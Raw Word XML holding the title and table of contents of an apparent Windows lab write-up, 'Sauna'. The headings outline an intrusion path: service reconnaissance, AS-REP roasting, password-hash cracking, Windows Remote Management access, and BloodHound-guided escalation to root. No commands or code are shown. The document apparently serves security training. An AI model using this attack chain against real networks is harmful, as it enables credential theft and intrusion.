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C5275" w14:textId="5D94BA2A" w:rsidR="007D568C" w:rsidRPr="007D568C" w:rsidRDefault="007D568C" w:rsidP="007D568C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D568C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tên</w:t>
      </w:r>
      <w:r w:rsidRPr="007D568C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>: Quách vĩnh thạnh (aka Sheng)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806B27E" w14:textId="016C7092" w:rsidR="000D5854" w:rsidRPr="00147C0B" w:rsidRDefault="00916569" w:rsidP="000D5854">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Sauna</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:id w:val="-1510367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1B24E4" w14:textId="4A5C8CD4" w:rsidR="000D5854" w:rsidRPr="00147C0B" w:rsidRDefault="000D5854" w:rsidP="000D5854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vi-VN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00147C0B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:t>Mục</w:t>
          </w:r>
          <w:r w:rsidRPr="00147C0B">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:lang w:val="vi-VN"/>
            </w:rPr>
            <w:t xml:space="preserve"> lục</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="5BFA74FD" w14:textId="33351CD3" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="000D5854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r w:rsidRPr="008E7865">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008E7865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8E7865">
            <w:rPr>
              <w:rFonts w:cs="Times New Roman"/>
              <w:color w:val="000000" w:themeColor="text1"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc152522878" w:history="1">
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:kern w:val="36"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>1. Technicals Details</w:t>
            </w:r>
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522878 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="008E7865" w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="326701C0" w14:textId="5B06193A" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522879" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>1.1. Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522879 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34BAF58C" w14:textId="2F7F5F16" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522880" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Nmap scan</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522880 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="036ACAB0" w14:textId="1CCE64F1" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522881" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Web page</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522881 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32EE78B6" w14:textId="52765230" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522882" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>SMB</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522882 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0199AF7E" w14:textId="59B9995B" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522883" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>LDAP</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522883 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7FEE3249" w14:textId="34424E66" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522884" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DNS</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522884 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="700C1F97" w14:textId="030706F6" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522885" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Kuberos</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522885 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C24E004" w14:textId="22C7ACB8" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522886" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1. Initial Access</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522886 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DB2AC2E" w14:textId="6A308D6C" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522887" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AS-REP Roasting</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522887 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A84396D" w14:textId="2E5EA8A2" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522888" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Crack</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> password hash</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522888 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D9BE6D6" w14:textId="5A2AF7FD" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522889" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Windows Remote Management</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522889 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00F36A3A" w14:textId="6C73A8F8" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522890" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2. Privilege Escalation</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522890 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="153ED551" w14:textId="6900CBA3" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522891" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Enumeration (</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>svc_loanmanager)</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522891 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="268A3847" w14:textId="6960792D" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522892" w:history="1">
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Blood hound (</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Root)</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc152522892 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7865">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F9DD572" w14:textId="0192415A" w:rsidR="008E7865" w:rsidRPr="008E7865" w:rsidRDefault="008E7865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52522893" w:history="1">
